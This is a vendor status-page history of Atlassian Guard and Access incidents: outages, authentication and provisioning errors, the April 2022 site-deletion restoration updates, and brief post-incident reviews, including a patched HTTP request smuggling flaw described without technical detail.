Historical record of incidents for Guard
Report: "Customers may experience delays or failures receiving emails"
Last updateWe were experiencing cases of degraded performance for outgoing emails from Confluence, Jira Work Management, Jira Service Management, Jira, Opsgenie, Trello, Atlassian Bitbucket, Guard, Jira Align, Jira Product Discovery, Atlas, Compass, and Loom Cloud customers. The system is recovering and mail is being processed normally as of 16:45 UTC. We will continue to monitor system performance and will provide more details within the next hour.
Report: "Issues with authentication across multiple services"
Last updateMonitoring has indicated that users are no longer receiving the error messages caused by this issue and it should now be fully resolved.
A fix for the issue causing authentication errors across multiple apps has been rolled out. We will provide further update when can confirm the issue has been fully resolved.
We are aware of issues relating to authentication resulting in 503 gateway error messages. Our team is investigating with urgency and will provide an update when available.
Report: "Issues with authentication across multiple services"
Last updateWe are aware of issues relating to authentication resulting in 503 gateway error messages. Our team is investigating with urgency and will provide an update when available.
Report: "Issues loading Administration across Atlassian Products"
Last updateBetween 00:00 UTC to 01:05 UTC 14 April, users attempting to load the Administration page for Atlassian products. The issue has been resolved and the service is operating normally.
We are currently investigating this issue.
Report: "Issues loading Administration across Atlassian Products"
Last updateWe are currently investigating this issue.
Report: "Admin hub not responding"
Last updateBetween November 1st, 02:57 AM UTC, and November 1st, 05:03 AM UTC, we experienced an issue with the Atlassian Admin hub not responding to some users. The issue has been resolved, and the service is operating normally.
We have identified the root cause of the Atlassian Admin hub not responding and have mitigated the problem. We are now monitoring closely.
We continue to work on resolving the issue with the Atlassian admin hub not responding. We have identified the root cause and expect recovery shortly.
We are investigating reports of intermittent errors when logging into the Atlassian admin hub at https://admin.atlassian.com. Once we identify the root cause, we will provide more details.
Report: "Errors with provisioning services"
Last updateBetween 25-Oct-2024 at 9:50 AM UTC to 25-Oct-2024 at 4:52 PM UTC, we identified intermittent errors in external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that impacted all Atlassian Guard cloud customers. The issue has been resolved and the service is operating normally.
We continue to investigate the intermittent errors in external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that are impacting all Atlassian Guard cloud customers. As the investigation proceeds, we will provide more updates.
We are continuing to investigate intermittent errors in external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that are impacting all Guard Cloud customers. We will provide updates as we learn more.
We are again investigating intermittent errors for external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that are impacting all Guard Cloud customers. We will provide more details within the next hour.
On 25-Oct-2024 at 9:50 AM UTC, we identified intermittent errors for external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that are impacting all Guard Cloud customers. We have taken action to mitigate this issue and we are now monitoring it closely.
We are investigating reports of intermittent errors for external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations, which are curerntly not loading. Guard Cloud customers are affected by this issue. We will provide more details once we identify the root cause.
Report: "Some admins unable to see some user/group memberships in AdminHub"
Last updateBetween 2024-10-18 05:40 UTC-7 to 2024-10-18 08:40 UTC-7, we experienced an outage affecting user/group memberships in AdminHub for Confluence, Jira Work Management, Jira Service Management, Jira, and Guard. The issue has been resolved and the service is operating normally.
We have received reports of intermittent errors for some Cloud customers, specifically admins who are unable to see group memberships in AdminHub. We have identified the root cause and expect recovery shortly.
Report: "Identity is not syncing new user and group information"
Last updateBetween 02:35 UTC to 3:55 UTC on Aug 26, we experienced failing Identity sync for Jira Work Management, Jira Service Management, Jira, and Guard. The issue has been resolved and the service is operating normally. All affected Jira customers were synched with Identity and there is not need to wait 24h for a full sync.
The bug has been identified and fixed. However, it could take up to 24 hours since 03:55 UTC for the User and Group reflected correctly. As a workaround, you may need to perform a new User or Group change.
Between 02:35 UTC and 03:55 UTC, due to bugs in Identity, some changes in users' and group settings were not reflected in Jira.
Report: "Atlassian Guard billing system is flagging more users as billable than it should"
Last updateWe have identified the root cause and have mitigated the problem. The issue has been resolved and the service is operating normally.
We are continuing to investigate this issue.
We are investigating an issue with Atlassian Guard billing marking as billable more users than expected that is impacting some Atlassian Guard customers. We will provide more details soon.
Report: "AdminHub Authentication Policies and Identity Providers sections are slow to load, or not loading at all"
Last updateThe issue has been resolved and the service is operating normally.
We have identified the root cause of the and have mitigated the problem. We are now monitoring closely.
We've currently mitigated the issue and we're monitoring for any related errors.
We're still investigating an issue that may cause the Authentication Policies, Identity Providers sections, and the new organization creation experience in admin.atlassian.com to load slowly or fail to load. This is not affecting Authentication policies in place, and it's not affecting linked Identity providers either but may prevent customers from modifying/creating new Authentication Policies and creating new organizations in Atlassian Cloud.
We're currently investigating an issue that may cause the Authentication Policies, Identity Providers sections, and the new organization creation experience in admin.atlassian.com to load slowly or fail to load. This is not affecting Authentication policies in place, and it's not affecting linked Identity providers either but may prevent customers from modifying/creating new Authentication Policies and creating new organizations in Atlassian Cloud. We will provide more details once we identify the root cause.
Report: "Delayed Audit Log Events"
Last updateBetween 30th July 20:06 UTC to 31st July 08:19 UTC, we experienced delayed processing of Audit Log events for Guard. The issue has been resolved and the service is operating normally.
We are monitoring delayed processing of audit log events impacting customers. These delayed events are in the queue for processing. Will provide an update when back to normal.
Report: "Some products are hard down"
Last updateBetween 03-07-2024 20:08 UTC to 03-07-2024 20:31 UTC, we experienced downtime for some of the products. . The issue has been resolved and the service is operating normally.
Between 03-07-2024 20:08 UTC to 03-07-2024 20:31 UTC, we experienced downtime for some of the products. The issue has been resolved and the service is operating normally.
We have mitigated the problem and continue looking into the root cause. The outage was between 8:08pm 03/07 UTC - 08:31pm 03/07 UTC We are now monitoring closely.
We are investigating an issue with <FUNCTIONALITY IMPACTED> that is impacting <SOME/ALL> Atlassian, Atlassian Partners, Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira, Opsgenie, Atlassian Developer, Atlassian (deprecated), Trello, Atlassian Bitbucket, Guard, Jira Align, Jira Product Discovery, Atlas, Atlassian Analytics, and Rovo Cloud customers. We will provide more details within the next hour.
Report: "Azure Sync for nested groups is not syncing new user and group information"
Last updateThe issue has been resolved and the service is operating normally.
We are investigating cases of degraded performance for some Atlassian Guard customers. We will provide more details within the next hour.
Report: "Unavailability of the Last Active Timestamp status"
Last updateBetween 1:39 AM UTC to 2:01 PM UTC, we experienced the unavailability of the Last Active Timestamp status in the new user experience under the Cloud organization. The issue has been resolved and the service is operating normally.
We are investigating an issue with the unavailability of the Last Active Timestamp status in the new user experience under the Cloud organization that is impacting some of the Cloud products. We will provide more details shortly.
Report: "Atlassian account session invalidations"
Last update### **SUMMARY** On March 19, 2021, a security researcher participating in our [bug bounty program](https://bugcrowd.com/atlassian) notified Atlassian of a vulnerability in our Edge Networking Infrastructure that allowed specially-crafted HTTP requests to interfere with and disrupt the expected handling of network traffic using a technique known as HTTP request smuggling. This vulnerability affected the following Atlassian cloud products: Jira Work Management, Jira Service Management, Jira Software, Confluence, Bitbucket and Statuspage. We were able to patch the vulnerability on April 16, 2021. Out of an abundance of caution, we began the additional step of invalidating all established user sessions across all Atlassian products between April 16 and April 28, 2021. ### **IMPACT** The HTTP request smuggling vulnerability was not exploited and no credentials were compromised throughout this security incident. In the process of validating our patch for the vulnerability, requests related to four user sessions were mishandled by our networking infrastructure, causing some users to be presented with a page showing the site name \([sitename.atlassian.net](http://sitename.atlassian.net)\) and email address of another user. No other data or information was disclosed to or accessed by unauthorized users during the course of the testing and validation. We have since invalidated all sessions on the affected products. ### **ROOT CAUSE** The root cause was HTTP request smuggling which allowed specially-crafted HTTP requests to interfere with, and disrupt the expected handling of traffic through the load balancers used by Atlassian’s Network Edge. ### **REMEDIAL ACTIONS** Atlassian has a [comprehensive set of security practices](https://www.atlassian.com/trust/security/security-practices) in place to ensure we protect customer information and offer reliable and secure services. However, we also recognize that security incidents may still happen, and it is just as important to have effective methods for handling them. In this case we utilized our security incident response mechanism to: * develop a patch for the smuggling vulnerability * deploy the patch to all production load balancing infrastructure * invalidate all established user sessions. We apologise to our customers that were impacted throughout the duration of this security incident and thank you for your understanding. Thanks, Atlassian Customer Support
Between 15/Apr/21 17:20 AM PDT to 27/Apr/21 10:00 PM PDT, we experienced some cloud customers of Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Atlassian Developer, Trello, Atlassian Bitbucket, Atlassian Access, and Jira Align were logged out of there account. The issue has been resolved and the service is operating normally.
We are investigating an incident impacting Jira Cloud, Confluence Cloud, Bitbucket Cloud, and Statuspage. During our investigation, users may be logged out of their accounts as we work towards a resolution. We are continuing to investigate and will update this incident with more details as they are available.
Report: "Partial outage on Atlassian Access and Support"
Last updateBetween 19:15 UTC to 20:00 UTC, we experienced an outage for authentication policies, get API tokens, claiming domains, and managed accounts functionality for Atlassian Support and Atlassian Access. The issue has been resolved and the service is operating normally.
We are investigating an issue with authentication policies, get API tokens, claiming domains, and managed accounts that are impacting Atlassian Access and Support. We will provide more details within the next hour
Report: "Some customers may be experiencing issues with Account Management, Authentication Policies, Admin Insights and Domain Claims"
Last updateThe AWS Elastic Search failures have stopped occurring. The systems are functioning well.
The issue has been identified to be an AWS Elastic Search issue. We have engaged AWS customer support for sorting it out.
We are currently investigating the issue. At the moment we know of the service that is failing and are trying to find the root cause.
Report: "Data on Account Management pages are taking longer to appear than normal"
Last updateThe incident has been resolved.
We have fixed the performance issues that some customers had reported. We'll continue to monitor the behavior.
Our data processing infrastructure is running behind which is causing inaccuracies in Account Manager. No data has been lost and the system should be caught up shortly.
Report: "Partial Domain Claim Verifications Failing"
Last updateduplicate statuspage entry sent by mistake please see future updates at https://access.status.atlassian.com/incidents/mdpn5plfcbc9
We are investigating intermittent errors for Domain Claim Verification for some Atlassian Access Cloud customers. We will provide more details once we identify the root cause. There is no impact to your user's ability to access Atlassian products.
Report: "Authentication policies not reflecting the changes on GUI"
Last updateBetween 14:00 UTC to 17:00 UTC, we experienced an issue where authentication policy changes were not reflecting for Atlassian Access. The issue has been resolved and the service is operating normally.
We are investigating issue with authentication policies not reflecting the changes in GUI for some Cloud customers. We will provide more details once we identify the root cause.
Report: "Domain verification is failing"
Last updateThe fix has been deployed and the issue has been resolved.
Team has correctly identified the underlying issue with an external DNS provider's API and added a test to verify this specific behavior doesn't regress in the future. The fix is being prepared and will be deployed out when ready. Once the rollout of the deployment is completed the team will begin an async process to force a re-verification on all claimed domains.
Our domain verification system is seeing inconsistent DNS TXT record responses. This inconsistency is leading to domain claim verification and re-verification of already claimed domains to fail with a "missing token" status. There is no detected product access impact due to this incident at this time and we have temporarily paused our re-verification access revocation system until the root cause is identified and resolved. Will provide more details when available.
We are investigating an issue with Domain Verification that is impacting all Atlassian Access customers. We will provide more details within the next hour.
Report: "Domain verification is failing"
Last updateWe have confirmed that the notification regarding domain verification failure is triggered by the last Friday incident. The service is operating normally. Please contact support at https://support.atlassian.com/contact if there's an issue.
We are investigating an issue with Domain Verification that is impacting all Atlassian Access customers. We will provide more details within the next hour.
Report: "Issues with Relay State parameter upon Login"
Last updateBetween June, 24th 2021 13:09 UTC to June, 29th 2021 18:16 UTC, we experienced issues with relay states configured in Atlassian Access. The issue has been resolved and the service is operating normally.
We are currently investigating an issue with relay state that is impacting Atlassian Access customers. We will provide more details within the next hour.
Report: "Provisioning of new instances is failing"
Last updateBetween 22:00 UTC to 00:00 UTC, we experienced a delay in processing for some activation and provisioning of new instances for Confluence, Jira Work Management, Jira Service Management, Jira Software, and Atlassian Access. The issue has been resolved and the service is operating normally. The small number of delayed requests are going to be processed shortly.
Provisioning of new instances and sign-ups are now working properly, the root cause has been addressed. We are now monitoring closely.
Due to a burst of retries, this problem has continued to impact new provisioning requests. We continue to work on resolving the underlying issue. We have identified the root cause and expect full recovery shortly.
We have identified the root cause of the failed activations and have mitigated the problem. We are now monitoring closely.
We are investigating reports of failing provisioning of new instances. We will provide more details once we identify the root cause.
Report: "Multiple products experiencing elevated error rates for cloud customers"
Last update### **SUMMARY** On December 7, 2021, between 15:54 UTC and December 8, 2021, at 01:55 UTC, Atlassian Cloud services using AWS services in the US-EAST-1 region experienced a failure. This affected customers using Atlassian Access, Bitbucket Cloud, Compass, Confluence Cloud, the Jira family of products, and Trello. Products were unable to operate as expected, resulting in partial or complete degradation of services. The event was triggered by an AWS networking outage in US-EAST-1 affecting multiple AWS services and led to the inability to access AWS APIs and the AWS management console. The incident was first reported by Atlassian Access whose monitoring detected faults accessing DynamoDB services in the region. Recovery of affected Atlassian services occurred on a service-by-service basis from 2021-12-07 21:50 UTC when the underlying AWS services also began to recover. Full recovery of Atlassian Cloud services was notified at 2021-12-08 1:55 UTC. ### **IMPACT** The overall impact occurred between December 7, 2021, between 15:54 UTC and December 8, 2021, at 01:55 UTC_._ The incident caused partial to complete service disruption of Atlassian Cloud services in the US-EAST-1 region. Product-specific impacts are listed below. The primary impact for customers of Jira Software, Jira Service Management and Jira Work Management hosted in the US-EAST-1 region, was being unable to scale up, which caused slow response times for web requests and delays in background job processing, including webhooks in the AP region. There was significant latency for customers accessing Jira. Some customers experienced service unavailability while the incident took place. Jira Align experienced an email outage for US customers due to the AWS Service outage that affected many of the AWS Services including Simple Email Service. A small percentage of Jira Align emails were not sent due to the AWS incident. Bitbucket Pipelines was unavailable and steps failed to be executed. For Jira Automation, tenant’s rules execution were delayed since CloudWatch was affected. Confluence experienced minor impact due to upstream services impacting user management, search, notifications, and media. At the same time Confluence was impacted by error rates related to the inability to scale up, and GraphQL had higher latencies. Trello email-to-board and dashcards features experienced degraded performance. Atlassian Access reported product transfers from one organization failed intermittently. Admins were not able to update features like IP Allowlist, Audit Logs, Data Residency, Custom Domain Email Notification and Mobile Application Management. Yet, users were able to access and view these features. During the incident, emails to admins experienced a delay. There was degraded experience when creating and deleting API tokens. Statuspage was largely unaffected. However, notification workers could not scale up and communications to customers were delayed, though they could be replayed later. The incident also impacted users trying to sign in to manage portals and private pages. Compass experienced a minor impact on its ability to write to its primary database store. No core features were affected. Atlassian's customers could have experienced stale data issues in production, US-EAST-1 for ~30s, against expected 5s at p99, because of delayed token resolution. The provisioning of new cloud tenants was also impacted until the recovery of the services. ### **ROOT CAUSE** The issue was caused by a problem with several network devices within AWS’s internal network. These devices were receiving more traffic than they were able to process, which led to elevated latency and packet loss. As a result, it affected multiple AWS services which Atlassian's platform relies on, causing service degradation and disruption to the products mentioned above. For more information in regards to the root cause, see [Summary of the AWS Service Event in the Northern Virginia \(US-EAST-1\) Region](https://aws.amazon.com/message/12721). There were no relevant Atlassian-driven events in the lead-up that have been identified to cause or contribute to this incident. ### **REMEDIAL ACTIONS PLAN & NEXT STEPS** We know that outages impact your productivity. We are taking immediate steps to improve the Atlassian platform's resiliency and availability to reduce the impact of such an event in the future. While Atlassian's Cloud services do run in several regions \(US EAST and WEST, AP, EU CENTRAL and WEST, among others\) and data is replicated across several regions to increase the resilience against outages of this magnitude, we have identified and are taking actions that include improvements to our region failover process. This will minimize the impact of future outages on Atlassian’s Cloud services and provide better support for our customers. We are prioritizing the following actions to avoid repeating this type of incident: * Enhance and strengthen our plans for cross-region resiliency and disaster recovery plans, including: continue practicing region failover in production, investigate and implement better resilience strategies for services, Active/Active or Active/Passive. * Improving and adopting multi-region architecture for services that do require it. * Excercise wargaming scenarios that will simulate this outage to assess customer view of the incident. This will allow us to create further action items to improve our region failover process. We apologize to customers whose services were impacted during this incident. Thanks, Atlassian Customer Support
Between 2021/12/07 17:40 UTC to 2021/12/08 12:45 UTC, we experienced elevated error rates for some operations. The issue has been resolved and the service is operating normally.
We have started to see recovery for this issue involving elevated error rates for multiple products. We are now monitoring closely and expect recovery shortly.
We continue to work on resolving the incident with elevated error rates for multiple products. We have identified the root cause and will provide additional updates as soon as possible.
We continue to work on resolving the incident with elevated error rates for multiple products. We have identified the root cause and will provide additional updates as soon as possible.
We are currently investigating an incident resulting in elevated error rates for multiple products. We will provide additional updates as soon a possible.
Report: "SSO IDP initiated logins and 2FA is failing intermittently"
Last updateBetween 2022/03/14 00:37 UTC to 2022/03/14 21:40 UTC, we experienced intermittent errors while logging in with SSO or using Two Step-verification for Atlassian Access customers. The issue has been resolved and the service is operating normally.
We are continuing to monitor for any further issues.
We have rolled back a recent commit from Sign-in-service and started to see service recovery. We are now monitoring closely and expect service recovery for all impacted customers.
We are investigating reports of intermittent errors while logging in with SSO or using Two Step-verification for Atlassian Access customers. We will provide more details once we identify the root cause.
Report: "Multiple sites showing down/under maintenance"
Last updateEarlier this month, several hundred Atlassian customers were impacted by a site outage. We have published a Post-Incident Review which includes a technical deep dive on what happened, details on how we restored customers sites, and the immediate actions we’ve taken to improve our operations and approach to incident management. [https://www.atlassian.com/engineering/post-incident-review-april-2022-outage](https://www.atlassian.com/engineering/post-incident-review-april-2022-outage)
We have restored impacted customer sites and the service is operating normally. If you need assistance, please reply to your support ticket so that our engineers can work with you. If you have any trouble accessing your support ticket, contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu) Our teams will be working on a detailed Post Incident Report to share publicly by the end of April.
We have now restored our customers impacted by the outage and have reached out to key contacts for each affected site. Our support teams are working with individual customers through any site specific needs. If you need assistance, please reply to your support ticket so that our engineers can work with you as soon as possible. If you have any trouble accessing your support ticket, contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored 99% of users impacted by the outage and have reached out to all affected customers. Our teams are available to help customers with any concerns. If you need assistance, please reply to your support ticket so that our engineers can work with you. If you have any trouble accessing your support ticket, contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored 85% of users impacted by the outage and will continue to get sites back to customers for validation, over the weekend. As we hand your restored site over to you for validation, please reach out to our teams should you find any issues so that our support engineers can work to get you fully operational. You can contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored 78% of users impacted by the outage as we continue to move with more speed and accuracy. Our teams will continue to restore sites through the weekend, and we expect to have all sites restored no later than end of day Tuesday, April 19th PT. As we restore your site and hand it over to you for validation, please reach out to our teams should you find any issues so that our support engineers can work to get you fully restored. You can contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have made significant progress over the last 24 hours and have now restored functionality for 62% of users impacted by the outage. We have also doubled the size of the batches we are pushing through the restoration process, which was a result of optimizing automated processes as well as accelerating our restoration speed. Our global engineering teams continue to work 24/7, and we expect to progress quickly through technical restoration of remaining customer sites over the weekend. If you do not have access to your open ticket, please contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored functionality for 55% of users impacted by the outage. With automation in full effect, we have significantly increased the pace at which we are conducting technical restoration of affected customer sites, and we have reduced the time required for the validation of restored sites by half. If you are still experiencing an outage and do not have access to your open ticket, please contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored functionality for 53% of users impacted by the outage. As outlined in yesterday’s update, we are restoring affected customers using a three step process: 1. Technical restoration of affected sites 2. Internal validation of restored sites 3. Validating with affected customers before enabling their users By automating some of our validation steps, we have now reduced time for internal validation of restored sites by half, which allows our support engineers to more quickly engage restored customers for validation and full site handover. If you are still experiencing an outage and do not have access to your open ticket, please contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have restored functionality for 49% of users impacted by the outage. We are taking a batch-based approach to restoring customers, and to-date, this process has been semi-automated. We are beginning to shift towards a more automated process to restore sites. That said, there are still a number of steps required before we hand a site to customers for review and acceptance. We are restoring affected customers identified by a mix of multiple variables including site size, complexity, edition, tenure, and several other factors in groups of up to 60 at a time. The full restoration process involves our engineering teams, our customer support teams, and our customer, and has three steps: 1. Technical restoration involving meta-data recovery, data restores across a number of services, and ensuring the data across the different systems is working correctly for product and ecosystem apps 2. Verification of site functionality to ensure the technical restoration has worked as expected 3. Lastly, working directly with the affected customer to enable them to verify their data and functionality before enabling for their users We have also contacted all customers who are *up next* for step 3 in the site restoration process described above. These customers are aware that they are next in queue through their support ticket and/or via a support engineer. We have proactively reached out to technical contacts and system admins at all impacted customers, and opened support tickets for each of them. However, we learned that some customers have not yet heard from us or engaged with our support team. If you are experiencing an outage and do not have access to your open ticket, please contact us through our (choose the Billing, Payments, & Pricing options from the drop down menu): https://support.atlassian.com/contact/#/ For more information from our engineering team, please read our update from our CTO, Sri Viswanath: https://www.atlassian.com/engineering/april-2022-outage-update
The team is continuing the restoration process for the ~400 impacted customers. We have restored functionality for 45% of impacted users. As a reminder this incident is not a result of a cyber attack and most of our restored customers have not seen any data loss. You can read a more detailed technical overview of the situation directly from our CTO, Sri Viswanath, in our Engineering blog - https://www.atlassian.com/engineering/april-2022-outage-update
The team is moving through the restoration process this week and is accelerating toward recovery. Functionality for 40% of impacted users has been restored.
A small number of Atlassian customers continue to experience service outages and are unable to access their sites. Our global engineering teams are working 24/7 to make progress on this incident. At this time, we have rebuilt functionality for over 35% of the users who are impacted by the service outage, with no reported data loss. The rebuild stage is particularly complex due to several steps that are required to validate sites and verify data. These steps require extra time, but are critical to ensuring the integrity of rebuilt sites. We apologize for the length and severity of this incident and have taken steps to avoid a recurrence in the future.
A small number of Atlassian customers continue to experience service outages and are unable to access their sites. Our global engineering teams are working 24/7 to make progress on this incident. At this time, we have rebuilt functionality for over 35% of the users who are impacted by the service outage, with no reported data loss. The rebuild stage is particularly complex due to several steps that are required to validate sites and verify data. These steps require extra time, but are critical to ensuring the integrity of rebuilt sites. We apologize for the length and severity of this incident and have taken steps to avoid a recurrence in the future.
A small number of Atlassian customers continue to experience service outages and are unable to access their sites. Our global engineering teams are working 24/7 to make progress on this incident. At this time, we have rebuilt functionality for over 35% of the users who are impacted by the service outage, with no reported data loss. The rebuild stage is particularly complex due to several steps that are required to validate sites and verify data. These steps require extra time, but are critical to ensuring the integrity of rebuilt sites. We apologize for the length and severity of this incident and have taken steps to avoid a recurrence in the future.
A dedicated team continue to work 24/7 to expedite service recovery. Restoration of all customers remains our top priority. We hear and appreciate all the feedback from our valued customers and are taking every necessary step to both restore full service and ensure site integrity as soon as possible.
A dedicated team continue to work 24/7 to expedite service recovery. Restoration of all customers remains our top priority. We hear and appreciate all the feedback from our valued customers and are taking every necessary step to both restore full service and ensure site integrity as soon as possible.
A dedicated team continue to work 24/7 to expedite service recovery. Restoration of all customers remains our top priority. We hear and appreciate all the feedback from our valued customers and are taking every necessary step to both restore full service and ensure site integrity as soon as possible.
We are still working 24/7 to restore service to affected customers. We have restored partial access for some customers and will be continuing to restore access into next week.
We are still working 24/7 to restore service to affected customers. We have restored partial access for some customers and will be continuing to restore access into next week.
We continue to work 24/7 to restore service to affected customers. We have restored partial access for some customers and will be continuing to restore access into next week.
Our teams are committed to restoring each customer’s service as soon as possible and are working through the weekend toward recovery.
Our teams are committed to restoring each customer’s service as soon as possible and are working through the weekend toward recovery.
Our teams are committed to restoring each customer’s service as soon as possible and are working through the weekend toward recovery.
The restoration process is underway. At this time we have no new significant updates, but the team continues to work around the clock to bring our customers back online.
The restoration process is underway. At this time we have no new significant updates, but the team continues to work around the clock to bring our customers back online.
The restoration process is underway. At this time we have no new significant updates, but the team continues to work around the clock to bring our customers back online.
Our team is working 24/7 to progress through site restoration work. Core functionality has been restored across a number of sites. We are continuously improving the process with the aim of accelerating the restoration process from here.
Our team is working 24/7 to progress through site restoration work. Core functionality has been restored across a number of sites. We are continuously improving the process with the aim of accelerating the restoration process from here.
The team is continuing the restoration process through the weekend and working toward recovery. We are continuously improving the process based on customer feedback and applying those learnings as we bring more customers online.
The team is continuing the restoration process through the weekend and working toward recovery. We are continuously improving the process based on customer feedback and applying those learnings as we bring more customers online.
The team is continuing the restoration process through the weekend and working toward recovery. We are continuously improving the process based on customer feedback and applying those learnings as we bring more customers online.
Restoration work to restore sites is underway and will continue into the weekend. We are taking a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of these site restorations.
Restoration work to restore sites is underway and will continue into the weekend. We are taking a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of these site restorations.
We have started successfully restoring sites and continue to work on restoration to a wider cohort of customers. We are taking a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of these site restorations.
We have started successfully restoring sites and continue to work on restoration to a wider cohort of customers. We are taking a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of this first round of restorations remains the same from our last update.
We have started successfully restoring sites and continue to work on restoration to a wider cohort of customers. We are taking a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of this first round of restorations remains the same from our last update.
We continue to work on partial restoration to a cohort of customers. The plan to take a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of this first round of restorations remains the same from our last update.
We continue to work on partial restoration to a cohort of customers. The plan to take a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of this first round of restorations remains the same from our last update.
We continue to work on partial restoration to the first cohort of customers. The plan to take a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of this first round of restorations remains the same from our last update.
We are beginning partial restoration to a cohort of customers. The early stages of this process will be controlled and hands-on, as we work with customers live to get feedback and ensure that restoration is working well before we accelerate the process for the next cohort. We will continue to post updates here as we move along this process.
We are continuing work in the verification stage on a subset of instances. Once reenabled, support will update accounts via opened incident tickets. Restoration of customer sites remains our first priority and we are coordinating with teams globally to ensure that work continues 24/7 until all instances are restored.
We are continuing work in the verification stage on a subset of instances. Once reenabled, support will update accounts via opened incident tickets. Restoration of customer sites remains our first priority and we are coordinating with teams globally to ensure that work continues 24/7 until all instances are restored.
We are continuing work in the verification stage on a subset of instances. Once reenabled, support will update accounts via opened incident tickets. Restoration of customer sites remains our first priority and we are coordinating with teams globally to ensure that work continues 24/7 until all instances are restored.
We are continuing to move through the various stages for restoration. The team is currently in the verification stage on a subset of instances. Successful verification will then allow us to move to reenabling those sites. Once reenabled, support will update accounts via opened incident tickets. Our efforts will continue 24x7 through this process until all instances are restored.
We are continuing to work on the resolution of the incidents for some Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud customers. We will provide updates every 3 hours.
We continue to work on the resolution of the incident for a number of our Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud customers. We can confirm this is not impacting all customers but remains a high priority for Atlassian as our dedicated team of SMEs work 24/7 to restore the sites as soon as possible. We will provide more detail as we progress through resolution.
We continue to work on the resolution of the incident for a number of our Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud customers. This continues to be a high priority for Atlassian, and while we have made progress, these applications still remain unavailable for some customers. We will provide more detail as we progress through resolution.
We continue to work on the defined processes to the resolution of the issues impacting some customers of: Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud. We are progressing through the stages defined and will continue to update this StatusPage as further details become available. We will provide more detail as we progress through resolution.
We continue to work on the defined processes to the resolution of the issues impacting some customers of: Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud. We are progressing through the stages defined and will update Statuspage again in one hour. We will provide more detail as we progress through resolution.
We have defined two processes to resolution of the issues impacting some customers of: Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery and Opsgenie Cloud. These processes each involve multiple stages of work. We are currently working on the processes and will update Statuspage again in one hour. We will provide more detail as we progress through resolution.
We continue to work on issues with multiple instances that are showing under maintenance impacting some Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery and Opsgenie Cloud customers. We have identified the root cause and have a two pronged strategy. Currently working on manual restoration for a handful of tenants.
We continue to work on issues with multiple instances that are showing under maintenance impacting some Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access and Opsgenie Cloud customers. We have identified the root cause and planning for mitigation steps.
We are investigating an issue with multiple Cloud instances showing under maintenance that is impacting some Jira Work Management,Confluence, Jira Service Management, Jira Software, Atlassian Access Cloud customers. We will provide more details within the next hour.
Report: "admin.atlassian.com is not accessible"
Last updateBetween 09:52 AM UTC to 12:47 PM UTC, we experienced issue impacting access to admin.atlassian.com through the browser. The issue has been resolved and the service is operating normally.
We are gradually seeing sites recovering with access to admin.atlassian.com through the browser . We're continuing to monitor the service and deploy the fix.
We are investigating an issue with Atlassian Access that is impacting access to admin.atlassian.com through the browser. We will provide more details within the next hour.
Report: "Errors when deactivating managed accounts for Atlassian Access customers"
Last updateBetween 3:35 to 7:10 UTC, we experienced a Billing and Provisioning issue for Confluence, Jira Work Management, Jira Service Management, Jira Software, Atlassian Bitbucket, and Atlassian Access. The issue has been resolved and the service is operating normally.
We have identified an issue which is impacting Billing and Provisioning. We will provide more details once we identify the root cause.
We are currently investigating errors when deactivating managed accounts for Atlassian Access customers. We will provide more details once we identify the root cause
Report: "Atlassian cloud product signup timeout"
Last updateBetween 08:20 UTC to 09:30 UTC, we experienced degraded performance on new account signups for Confluence, Jira Work Management, Jira Service Management, Jira Software, Atlassian Bitbucket, Atlassian Access, Atlas, and Compass. The issue has been resolved and the service is operating normally.
We are investigating reports of intermittent errors for Confluence, Jira Work Management, Jira Service Management, Jira Software, Atlassian Bitbucket, Atlassian Access, Atlas, and Compass Cloud customers. We will provide more details once we identify the root cause.
Report: "Atlassian Access license subscription/resubscription not working properly"
Last updateBetween 20/Apr/23 12:00 AM UTC to 28/Apr/23 6:00 PM UTC, we experienced a failure with the product subscription activation and reactivation functionality for Atlassian Access. The issue has been resolved and the service is operating normally.
We're still working on the issue with licensing subscription/resubscription that is impacting some Atlassian Access Cloud customers. As mentioned, we have identified the root cause and applied the fix for some affected customers.
